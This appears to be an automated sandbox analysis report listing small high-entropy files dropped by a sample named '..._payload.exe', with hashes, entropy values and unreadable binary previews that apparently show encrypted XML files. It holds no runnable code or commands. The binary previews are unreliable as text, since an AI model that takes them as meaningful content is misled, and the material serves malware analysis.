                                                                                                Preview:<?xml...;...`..y....<r.Un.W..D>a...w...P..8}....B.^.X}.d.%.......qP^.:g..t....$,x.%...R.o[.u.8.J..1e.:]<.'?x..4...x.Aa.NxY.U....".).U...A...+.3.g4..H#..g.N.yk...).p]kR...........yR..j....l...Bsqu.<........a...C.R-7O...3..U..Af...W.?:bHI....7...2..D.\8 6C.F5.>a.6..&{L.A.6S._U.\2rL|/~b...`Y...{.R*.k..+\.+w!i!A..Ay.._.....o.Cfkim.....M.z.....\.._1..jX.v.... .f..I9Ga...8=RWb.@.nTPj....R{j...sU.*$..........Ra......o.B...`.M.x.nw..^..p'*C..&.G...Z.J.T.5-..i^:.b>.4.......&a.8.......|8#?\....8.q.'.R.~..ick.w.....W.......!.V.......l.;..~..H.p..g,.h.........Y..kz.L...vj.fY........][.O.|.<....Q.b;3.m..#9,.=....s2.OWT...9rV..T.\fJ...c.+...5..^.6.v.9...09...7r?.a.9..AQ...!"..@.y".w....6..."RI...ff...(>@bhH...".t}..CP.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1485
                                                                                                Entropy (8bit):7.8639393297082885
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:2Q38Gb9l2W4XudxXAjXXzpDb1GZB22q+pBAss/4ucjgfXsaOTm4CD6c49AvutGSl:T3n9MWiurABkZB4+plb5aOK4CD6c49Ac
                                                                                                MD5:1560D101FFE7E018425EE078DAD62A8F
                                                                                                SHA1:54D4D8E2B64029BFAE9E4FDCAF32C35CA8F381BC
                                                                                                SHA-256:EA7CCDBBD02F67B96C5ACBEDD07BA72768B52A613F2B99E0406310196383202A
                                                                                                SHA-512:E646AD016A4FD640D226EB8F32012F4A6944EF0ADAEEA1B35FC60E4AB31216D33C7C8011A5028E8A3CDED5207B9799CB9295E55AC9B79ADBCEFAC9F2F4D870B2
                                                                                                Malicious:false
                                                                                                Preview:<?xml....y..q.0..f...?....Xx.=..us.....V...O..h.j.b|....D.k....Zy..Rs.,7...X..K..(...@.r.. .#8..YR.E.-.,..U..p.}c.+5..oL.}3FE.,.ktv.8..,I.7-fI.N..x..z...Q...fL..-....[+....h..n....*...8.&D..i<Z.....c.uT3R\J6....>...,......0n..x;....r...`...X.X.}..%N......=.!.v.M......2.s.....S...l.../.o...dg......:i:.......9&;..$.B..#.S....e..r.....M.....r.Zm.z...7`...|..N.Us...LV".................FG...u.tDS.>..K..&-D.0.Xw..Du....M.P...~.Y........q.&..6.S..w[";.CJ.z..>0..P..&....g..>.m*j...u.1.68-..R....`...7.f.[q......g..Tk.=V@b7..Q.c..b..A..ng.K....k........=.j..|!.....).a...XJcr.l.....p....[Za.te.UT.l..._..&.........H9.D&u5...v&'=.C......a.QE..1.........B.f......./-.wE.r...U.d...0..b......R...%#...8.Z.?.....]{P.."c....%.-...B.n?.n.t;:..C..L.qb.rVH.~...GS....n,....L.=......./.(....m...c..w.aWP.n...N.i.%"t..h.Y[g.......u.Yy......L...:...E`..B.....\.x.#S(t..^.Q.u@..v{'T.!..p.......7..6.n\..../..../.NN.Rc....r...$ %.].........x....2........Zh.Bi>
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2088
                                                                                                Entropy (8bit):7.898307550509393
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Xo5OU1IQmmSljg17evNLYh+xPFw25OjDOLdqDhfvWyeotIMLD:Xo57mmSlM178NLYIZOjDO5UvUoZ
                                                                                                MD5:28EA983BF1F94EDE328F0AD75AD0737A
                                                                                                SHA1:CFF61D20ADF56AC61A9BC097BC2B677A2EA6BCFD
                                                                                                SHA-256:EA6E72355C61CD5C032CF344181F0E790584B628869E6BD7239E845BC32FB0CB
                                                                                                SHA-512:F679920D42602C51473AF5C2392FB62D7F90FB193445C9B10697C9B7A36C79C419854B728ABA4712E0B949C156157F281661F8C3214EBB1A7EE4774E9E1336B9
                                                                                                Malicious:false
                                                                                                Preview:<?xml6..h4..<........I..N......eZ.~=..u.L...3.a...._!..[.y.9.LW.R$..r.8.V.y..f..2....)h...b..........M.!A9..k.....H.S.0^r..}.bN|...L.W.r.$...>H...j*.M..?..s...340.rCY^.V..`?......V/..>..4.f..@.I..i+w..K.~..L..lkr.^....~.Kj....!..\..c.P.P.>.d{...,i.O.a!..........O^...*..Gu .......nU.k#..*...k.tK.!...w.-^q.8......*.,.....x'A..{;\pw5]^..NZ..J....t.c....HOE...9w.....C..%NT.d.Gur..u._A}Ol....XZ.lWq..5t.l..r..p...j'.....%.........H......!5<.....gl.Q..paE.V?n0.f.Y.<.05.v......vO. ..Q.^3<s...Q...P....6........7....C._J.Y....f4..Jb...3.1.."...g{=(.0:m.Y.c.T.%....l..?.6s~.^..;&`.lF.R..LVy%.*.L..}\..-[.....>V.z..GBV.x...S.o...%h.B.G..#X.".A..&V.1..+r...Q...H.5..]b..:.....%....4.>l;}...kl(..O.|...Z/(.....g....v}.v.I..Q..RM....2..M..1......D.D.....5-...u...#...]....>b.....A.Hz]$(+9.).j.J...o2.|.y..fg{.5.&$l.....U.w...i.._...X.#n .-B.j.@r..k>i...;.TC..o..S.R.9.U..=v...=V.R..V...\..+.\?..^.(XXnL..f....6..S...a.A.@_]5 .a}...7...$.|..r.....5..Y
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):761
                                                                                                Entropy (8bit):7.69182334790521
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:lrxZlCoPpzAEFplQdfS2MPTJCFWyntC0P2Jc28he4lQ7erQRHyNO9R75liO1GmZp:rXCoPjQdfIJy2S28hg7erbNwFzGmZuzq
                                                                                                MD5:20E13071CDFD63AB4E3D3CCDC21DA0AD
                                                                                                SHA1:64C43217C5F5399A661E3D244B89702AA8569C85
                                                                                                SHA-256:17F6057115892BB72B9798ECDBC0E246E70D79167E6C2953C951D44C2F3AF036
                                                                                                SHA-512:C513F248DD7BF723721AD37DDBFCC89F98C490A3358055641106751FBE9321347791F25623F007A0E570A338744DB62CE1D8398BEC218C100519FE0B44F4E82E
                                                                                                Malicious:false
                                                                                                Preview:<?xml..C.4b....)..A&?!.....o...6/.|.F.....?4Q.9...Yx)..T*R.}.......tLI.Y....'.7.HS|. jq....&.p..I?.-fX.....s.9..ug......mT.........v.yxW)..3(...&w....}.Z...`..s.j..w.w.F....."?0k>.y...s...]....#p1...)....&k]..g........h.Yb.....9.~.@".\.XM..N..l9u/.u.....z.U.^=h..8....7?....._Z.....]..[.I.o..#..i.K%.S...cj...fDt..x{.k..z.....yi..r..<d".s.Hp2.e@.....`.x...a>yG..=?.L~KV..|m....N-..J:1.%z....:.x}hH..i.s.i..Fl...Z.....x..Z\.I.F.HP..z.~p.]....@..c..CmI...]E.r.\@*...U..mj....&R*>,.(L...\W....Kg.Z|.....e,?.J..3..IU8.c..)4...mY..]..$.(....M..vi....1..(2.vo..+..4....KH?..x.f.9..[..IZ]b......n...E.-,x.bro#.:]..oh..O...(...).......JA......9.I}L\.r.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):854
                                                                                                Entropy (8bit):7.774645890688024
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:nLOnZsSWKpExl/qVzXLwP91yPsyvKgXc5zMT30eGBlwzPBuEI/Xsrp2lhFH4Oa2I:qDExlgDEPTciOezML0h9/UCFY95x3bD
                                                                                                MD5:DC307C198DF1F226C581F1EE82640883
                                                                                                SHA1:4D4A09E451320F9D336AF1FED3CCA4850C185A82
                                                                                                SHA-256:634EA1EF2C9E27EFA1403A657218BE383B55C049F67ACB02ABBFD4A5AC2A9F1F
                                                                                                SHA-512:1840003A4953323B737B6B4E045D25F99C35142E2A40EA94922E5CEFC260A7B78635797ABF739A5CAD577E5C2C5D738E4D5BD7B75C17293F856DC625DADEA5DF
                                                                                                Malicious:false
                                                                                                Preview:<?xml'....e.J."5n.t.IS..v.........k.C."...d.$..y>3..D3I..f..7lj.=..d.......)..y.....4.UV.Fj..w.\.L.@X.N...qhEh....J......r.Y=.QK...w.......K..O.......I.....a.f_r.Z..Na..@.#o.....1O.&.q...m*.."Y..>.G..R.<....RB..H......RT.....}E...x...4...3=...m.}S. j^.^....}.Q..f.....v.v V...{.0....F.`.|.^.H..0h..0..x.Cj..}>1...L..A....8Ro9+.zl;.>m..{.4.Cb.J .e._P.V. .........p...o......s...+`l.<.T.q.bp'./.Z;....;.Rg.O...]}?G..o'.M=....;...Hk-..3.Z^UK."1.S$w.R..9..B..].....Z.."b.@...P._...p.Y....UE....5....&S..K..g...N...F..(..fY9U-.r\.O{.1U..Y.A....N.g..E.n....i.............1....Ci.. [.Fd.,.7...M^h[D}....A.#\k.:...L..........B...c.z.`.A.<ue>w.R%..S....,..6x%h.....I.Q.2..;....(.......SJv..I.s............;0[x..Cyg...cV./.......K1;...xT..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1612
                                                                                                Entropy (8bit):7.895911047006751
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:HiXo+W6BQJV4koeDZeKkf6vxE7fr+0DLD:CSVJWAU6vqb
                                                                                                MD5:4CFDD5692636167B84EF91FF5DF1E577
                                                                                                SHA1:53A50122E537E86D48F955591427882DC49B99E2
                                                                                                SHA-256:31CBD8762DCB87795F75E4B944E5CEA670D19BC7DB13F8D4255BBB276B868003
                                                                                                SHA-512:52DF867924A980C99AE791D2F5CA92A4C77DC61A128FCDF69543E1A70D83281F973FF121BA9A20182883504D3100BE92050C1BF798CEFB4698E30C0542CA7F28
                                                                                                Malicious:false
                                                                                                Preview:<?xml....~.3u.AU'....s....<.......j......m.x.r..+....t.G.l....x.E.XL..`.1....ULT..Pb.G..H.;L.....Wg9..5..y...l..9..!..+.....wR...).:y.2..mn.........5..G.l...U.]....{.92...E.#.....7.RJ.Q..x>......*.....:....K .i..u.]...\...)....{......3.'..^'.{.6...5._.w...l..:FS...Zw.%.7j7.....0......T.yZ..GjZ%k.5w....2.........'2v...%......)90'.;=....U.....!.@...NSY....k%.w].O.|..+.)..*..$2.....%.pC.....N...d...NV....a..Td..<.Z&.[Y.F.......X$.....a.Q..wx....HU..i.m-....q.63...Q...d.mG_h.q..7.v.......f..........,)$N.].r...j.=.-..:D.D.".....c..*Hi.v...D..fT....o.^-.....C.$.".,\.....A.]...\Q..G...I;..D.=...L.G.C.....@.._..v:..|..!.K.r......qo0/#.S.!?.L...N..V.|..(..[.6g.;..}>#......_.*......j..u...K(z:......=.:.e.s^!o.pIp.q.M..9.Q.9.Y....>$..z.zF........".....G..AJe,.g..$.MZ.....k@S....b.._4&3./4......:.....r..)....cDP......|&e...l.(....fX.&............-...5...n...:..9.k.....l....lth...n<..c..........L.._.....5E,.?.WC[xk..$...e;9.P.I...k.R.VV]t...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):747
                                                                                                Entropy (8bit):7.672815222145467
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:tWGQ/Dw7WsWSE9YVZpkMrZk8h7u5/nJY+oNKk0jI/yUwSlSbxET39snbsgJc3ciD:ZQLOASEitkMSzvW++KHE/x8bc39sbsxn
                                                                                                MD5:02AFB4291752311A7265E45EBE52B573
                                                                                                SHA1:27CA3123D626A76C725299DA9CC18D788FA8E904
                                                                                                SHA-256:DB0F6048866E35F60DDB2AA324B3360C22BEA60084FEFB23B95F59CD70F86229
                                                                                                SHA-512:B3A7DE697CF95EC3DB8CA10E6D386D63F99379433A931B04C4884A57DF97A1FBB1AD70FB2DCA70288F7D994AB91B07AFFDA67811F1D353674826AB20B7AF74C8
                                                                                                Malicious:false
                                                                                                Preview:<?xml*#-~.E.K....St.#5.......3..h...~.d..7.$ts(...'..-.7o.....-J.^.R.4%9l./.+q..f.......H(...b]....~...L&\..~3C..g.G..3R.6<d.el.>...P5S.......$./.-....dI......l....;V....BO.....a...7I[IA...y....h.S=..O;...|..1.hn.]6.!..k...{..WTg..m.A...W..5..l....N.^.....Ch..y|..|.+......f.<..y|Z..0A]......&..B...C.B.^'..v..*G.=o3.S..].4...,......D2..Q.5...d...=wq...{....%.f??Y7h.B.E...B6.|.{.2y.J.7q..3.....V,.Q.J.vuQ......A|.....mG.g.h.m..'U..:%i.....n.......,v..z\=...hRs..w..m||.ET.M.P*..&Rz.d...l.c,..'..z...<>@.X....GZ......;....Z?w.V....(.2. .Wm.Z.6.j%.>{...~ ].7.>..1.X..8.=.......f.T..1_{...Q).w.o.v.(...fa.jF..C~..H..cQ......4<X......6l{.\..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):742
                                                                                                Entropy (8bit):7.660369957766593
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Yn1aa2te7EU++pSgj2YDW/pxgwXKXuu7RBXRLRZd+/njxyzIG1KVRTwakjDpN9eD:Yn0t0++52YDNwXKXu4XXd8/njKV1AJwY
                                                                                                MD5:3AFEA971A7CED230F8D77F393E4F064C
                                                                                                SHA1:506388F75260EDCCB7A3BBFF43BE319D00031747
                                                                                                SHA-256:A83B931C02F06402FE920B647BF5FD37B3DB350B2C8E1C96AD5F4664117C9FE4
                                                                                                SHA-512:3360BBC75B1FE8B1F6CB323917FBBA357346C5B6BD31046099EA73EE71CA938DF73AB71C48D60E8B75AA497CD49039A435CCCAE0D4E88F4A068726F4605CACB0
                                                                                                Malicious:false
                                                                                                Preview:<?xml%...c.M..x?h}.(...d.+2..$..p..5...)8./..3...pA..'...AG...9.u...X...z.Jj..s.......X.S......xC.M-.Lh.N..B..1U...#S9}C..!.}M...#.@*..........1....x....h]..d.^Z..7.n0qss:3.PA........a.r>r.8.(K....TA...|t..|..).....@.r..(.M\.-G@.OZR./[S.>4.......^..e.b.l.A.._|....k....n...... .c#UXm.}4.:;+Q...Q...../....R...P(.$F'..~........G......O...H.....\.. .F^d....4.}.|.s..~X-^|.2.%./.<......h...... X+.....#W0B....y.$UA..........~Ue..R..O/......?Zs.6.._.Q0........*qQk5a!...Lu...].-v.u.X.9n..c.....B..}....yM....}.].g*..B.b../.<.'v..~.`.@.C.D.Y..K%F..B`5...@:m...5......i...1.Y..7K.`..".{.....+..|o8.f..\.n.....p-&...r.28.Z.....4<j..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):756
                                                                                                Entropy (8bit):7.673537170453991
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:ZiUGNWlaOdhNS6CiCmHQ2u/IeWiW2Y98FlGCG/C1nLSgJc3cii9a:ZiUGNWlF5JFYIeWi8qr1nex3bD
                                                                                                MD5:5C4EBA23DAC9C21C27142B4396E364AB
                                                                                                SHA1:DE9068B35BB00920C945366E67DBF7A5A92906F7
                                                                                                SHA-256:BFB5058155DE2FB6C510376ABF0DC611FE57E6B236524E6B9597ED5251830F64
                                                                                                SHA-512:F865C8CD6F602169E1F43538B261C9C988B2320962C560898AEC08C0ED07EC2AE9F796450C446441910481E800441BDB34A83EF4472D184D3B3B3291264477CA
                                                                                                Malicious:false
                                                                                                Preview:<?xmlVY..A\...^.......U.&?w=<d..X...M8.Cp.r.....W...rW..L.Gs{.._...;..[.......HP..}|N.}2_.....zpV......^.q_....P...y.3...+.....E1...&1M.y-.APC.2...V:<.2..$q(...dvd%i....%..F..>....l".{.BN8.>.B..s...t..ch.h.......G... .{..!A?..Ws.t.R..Zm..C.<...B...N._..G......:Y.]9g..g..+ZJ.6.A..k.%...N....K...../.s3.....U.s`*.....Lw\.c<P......B.INPW.y...l).u...o.....%....~f...H.4W.<%F.mRl.^ R.<Z..6U@.."...I_..r~%3,A.?.2..Rq.G>,.....j).`..^..M.N..ZPSeb.q..S..$.U..p...}?.....w...KO.....}....].....M...J..?V.I 2....~.z...(...GUG..!.y.;..^..683.`..b.^..........u5.&.#'#..K.y7... q....vp....\@../....X,Dcn..Cy.....{.Pq.w..!.0..8.`..I...M....3...K...../Of.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):763
                                                                                                Entropy (8bit):7.697854416093258
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:sTCsGJjmOOfOhLatSV/2CTIqCJLmplrks47CrSNvxiOUwbJIh9eCoBggJc3cii9a:2GJj5xRU9JyXkP+ruxzUhMTgx3bD
                                                                                                MD5:C5D10F336D7AB287F1BA4B7B968AABAF
                                                                                                SHA1:1A912BD7A347D957B96F7D4D604D8D35FE610680
                                                                                                SHA-256:A64639C3C4144F34FFC669A85895E86DBFF23B4D545FA5209EB7046A4124DC8B
                                                                                                SHA-512:030D670334F8E5E6A5254AC307811BB84CAD2923C6EB5B7231F82E4F2F81ABCABD9BFA0AA6AA79F075B42FF4642A47577790B9CC8BDD90913DA9843889B2671F
                                                                                                Malicious:false
                                                                                                Preview:<?xmlQ........q..B$.......z.mH.._...&.`S_zh)..._.U.IMG.u.U..7z..Dg9..Y.B..MG.... .F..Cf"..}...g+..Q ...........<N...|....ZA.|.^..?=./...3.]...)...rj.s.p....q.Ml....B.....Yb.....0....`.....BS.."`j.........s**..J3......YB0.W........[.eBm.5...d..>......K..._B.<*V.B..V\.>.v,vr.....Q.....r..].rL......U......>. n....[......<t.....<1q...J.UG..S......s.3.X!..=.-!.oD....`....A.#.-\a.o.V..!fe.............&.H.u.....f....X.....9H.g..MS..J....g.v.w....e..'......4...dR...!..jEt*.\.D9p....ly` ..`...Y._0C...c...Eqd1.4jU....g.?.....n@^..H....z.s...^.^......i..#..c.-...N.EA...[$..I`........d.9.%B.F...s.q..N....=Mu...U.mD?.....d..u.O.v.+...i.I.....F...?..QY.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):956
                                                                                                Entropy (8bit):7.765321801868195
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:ZWFkb9i5HUSZ0BrGCrf3x3AcmotIpsVL1ASu7NeyRIi4zdw51HJ08gJc3cii9a:aao0BZ32lwMoqS+Neyj+s1p08x3bD
                                                                                                MD5:B638B277F40A983DC4F4E9496774748F
                                                                                                SHA1:F4EF5823B0DDD1F86FFF9E156E4BBAFFA6FDA105
                                                                                                SHA-256:3D50F378C1A97E5AC8812DBA4E9854413C894A98F01742342481742729F6B7FF
                                                                                                SHA-512:C529FFF1683405E5F0845568579F5F7F8D81EC11308E9EDE1C42D42444E3268D7DAEF3FFC279AD51751B667DEE51F8FDAE28BB81A589B6AC9CD60F0C9FA55842
                                                                                                Malicious:false
                                                                                                Preview:<?xml6.}).&U.$.1...1.E....a.W....D9.....v.q...=.......8zRE.G e.B\y..v.d...x_L.....>.Y.....6.xp..+.L..5q_...$6..%..K...b?..v...<...^0..i~....*...}Xy.%..ec.a..5.!L......,C;..D-.......%..=.g.0......)..B}.54.]w.N.j......|.|.!*$f...KK..]._[...._B.$!...0.Z2 .p.....o.#s...5>k..;x..o7..n...2...#...)..@.d.t..n!..j..]..7<eM@.y.s..\.....Z..6.9J....T..6..k..N....5...5mL...o.2............E.H.{..C..iZ...}.'.0n;...xA...w}...a...U.M.h9...]..ON!2..z..!P.j.z1Q..R.@../..[...4s'.igS.......J0#.Y.n..D.....+.-w/i.0big.....c..Y.............<...E.W/1..Rw.......5.v.'....|1...|x..w.D..#p1....u/Qd....I..}..E.'....."....i......._..i.S...g`.)B.A.Kv..../)..RlD..LQ..(.c....C..6>......q....Z...50...3.(%.G.q........Ij.W.....+......Ij.:...o!.q...gr.HU......?...C{..E>i......A..I3*...I..{#........L-h._..d.M..A.g.b.Q.:..}.......+.R..c..~...vE.....;r..L.1%0...m...3BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):837
                                                                                                Entropy (8bit):7.7122864001758575
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Zti0+sc8U8G0Dx+ff4iNvXMUz/PG6gbgJFPO4VdCk2Rx3bD:q0Jc56xk4SPUz/g2LLD
                                                                                                MD5:58E9FB8C3AA92BB98FE1125B3235C8E9
                                                                                                SHA1:0B583CB240407533435874CDE7F0AE5B7EECDE06
                                                                                                SHA-256:43D17E50FCB9AC46BBB5B28ED23EEE19EE22D9D515D5364C0EAE55C27EA330C5
                                                                                                SHA-512:874F6DFDC07F8F507CD58B4C0CDDB4DD226A52756303E26ABC493C62FBCEE63A5DEFAB1C0DE2BBC9414C3421EB37F73805E0C42BD891B254263F10BDD62550C0
                                                                                                Malicious:false
                                                                                                Preview:<?xml....g.f;.0.dnr.?V....i.`...0.]...6^Y.,.)CT...V..W.].MNG.P.$..'...@&.j.......(..quh..4..f......w...-..ER$.%..2....CE...5...V).]...6Yj....T....%...."...-o.{t.....P.4....O^S.."Qh{.}...&hLDd...-...9...y..$}8...).a.>....gY..`...|........T...`8=.(b.8.~...<QNh.....S...Z..n...sLe..M....../...}.......T,:.._.9.~...]s.?...b..z.;.m|z..f..-.|...s..^.".y.}..).....*.nV.............5.2..<. {...9.@z....[..@l..@h.z..4...2..{.Y...|.C/W)l,.u.(..c(...X.e...f.y:X....)).M.;..O.....k.l.#`.P\.."O....e..5.0.Jpg=..........(....t{yU..jIp.=c?@.L..T.p.>..Q..X)...........~.........I.O:"Xa..14..QeI9h4..N.Ip...[.wx.U.........C.C..u.............f..o........8...h....v.........L.5|.)[N.....u.%8/ ..3N.......d.... ....rT.Y.@(.....mc....%'R.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):851
                                                                                                Entropy (8bit):7.721143913843414
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:xp9mdIYLfS7YedmwFZyr3Zg/SoFd101LVox3bD:xLmGya9dmyZuZg/zo4LD
                                                                                                MD5:911C31D435690565A2D1680C77BC53A0
                                                                                                SHA1:070C482E8C1AB436DCF5F6C930007582896E4BBA
                                                                                                SHA-256:EBE1F112B1413C94D703BB101691E5C3E4C3851E4215439BC7E83A044CD0C206
                                                                                                SHA-512:C98312B3A96131EA1FB25609172719AE028FBBB4ECA36B5531404F783F61C159A82B0D28A339F2EBF51893ADF188729B841556D771AA02064327D4369876C56E
                                                                                                Malicious:false
                                                                                                Preview:<?xmlBd..l.......P...aM2.N.1...n>..0y<.^.bW...Np|..f....d..8[_.q.h.jnt.`y...(..}.)..U.....j...V6.....Y....> ..3~2...p.?..xn......C9C.....?........}\S&.!.d.....".6.....N..V..r.F..(.*9.l.`..Z.........5..w..t....8.~..(.i#%w...R..].,)..=..1k.0.....n."p,.-......=...H_P..6.!>..+0..O.C.W.%W<.rerB<+..1.J..!..+Z..j..^..[...._....Ug.S.....|$..g.'jZ..(.....U]-V.q9.o.;A@..8......hD.k...k....O.%.yV!..R..x..@#=^..J.D...i.C.T..=...|.4..\7...@..N^l~$k!.u...".?.e...I..2=N.`d..}Y.t...0.$C...r.x].[.|F\~..C..v..W.K]..6.c.M..`p...)..(...qB.R.u.....=/...>..a..A*..ws.4...y.6.8..n~.$..]1r<.I{..)=I.4.......^}#acN';cJ.X%.s3,EPwj<.N..`..i..+q..$7....a......."~.s.........i&.N.?......VE.....S..>.t9....qgHF..|.SB~9.J..\:..S...M{.g....v7..MM....i\.~?.8.gqBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):956
                                                                                                Entropy (8bit):7.764735551090204
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:OJ9YIZwfb+nN2EDwaHuM9+HSzhmnvlFx3bD:O/ab+X0aHuNqCJLD
                                                                                                MD5:A358D2FAEB45CAFF4A0C5D54B8D34A71
                                                                                                SHA1:682713C7FAC6D53FAE360FD6F3641D41C2942D52
                                                                                                SHA-256:33290DEB62F3085441234A451E1C2DABE2E65A4CB00BF275F588F55E224ECA39
                                                                                                SHA-512:408DB1CDB9821ADD954D5ADC571CC35BF2D28B115A9CE839442D6FDB7238E93C6BDC2899DCBEE639156ED24F5E8624CA71B85472954CD03A28E21F1AB53B8AAE
                                                                                                Malicious:false
                                                                                                Preview:<?xml,.....X..N...WGH.lf,.W.O3.h.2f.y...g..G....[....BS..>.........,..*..I.<.U...%...M......V...>OQ..y...P........Z.....S^.I.....`....U.Z.:a${|..^.Ju..L8.sX.A.O,.... .y..>..d.....!]....E..]V.k.l...1|.d....<=r..`..6A.U.#.:..r....}.j...O.[.}r..ywTg7.|..H_$..|1.s..d..Q.F0\...D..U. L.?.3._-..8.....v......t....=........8..w-qg..6.S...9...ne|q...Pt.;.!.C^.../X^m^.|b..g;.s..%J<o...u.UZ.bs.N.,.....&..}.9.V#......w4+.7!s..r:....2...I:.bL.%.....o.A...K...j.E.P....n...1.....s..U..h8-a....@-=.:......U;....$XX.1..X.... .{.5....~M.....ei..4.]!...9.h;...PY...u..I..4.Z&.....5........`.>.Y..../..h.....$F..Bm..W...m...+..N.;e...qu.1hvM2..<Sg.....W..h.s.......(.l.s..w..ny/.b.....R...s..`......_m..`...........&Y7.B.P....~j..wV....C/..q..;...^.bc..?T:(".w@...O..U....jU.d]..O....&..."...U....^..>..w.............Q..Zf..Q.o.vWT.s2..f0F H..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1135
                                                                                                Entropy (8bit):7.822591649246113
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:XinO5V3CYYfyj3GIJudo0Znv3BBgW+BYRaNFLfNAjYtLBg1x3bD:XidzfuG+udo2nPBBiBYRaNFJAEtLILD
                                                                                                MD5:8CE4ACC7AD26F6EB98211709A897DB5A
                                                                                                SHA1:F631788BACDCBE9FEB64FDBF7E4F61F27BD257E9
                                                                                                SHA-256:E38A09181E447FCB2F624ECF7501B17D06DDA1A896086451DA7F79AFE8B8EB99
                                                                                                SHA-512:D1E2A02326889A829932822E520B3D1718E712A04864312D10F50920692C73C445E5B07AC68B016106CA7B3EDBEDB030946887DD6EEA0669952B5A2EEBA2513B
                                                                                                Malicious:false
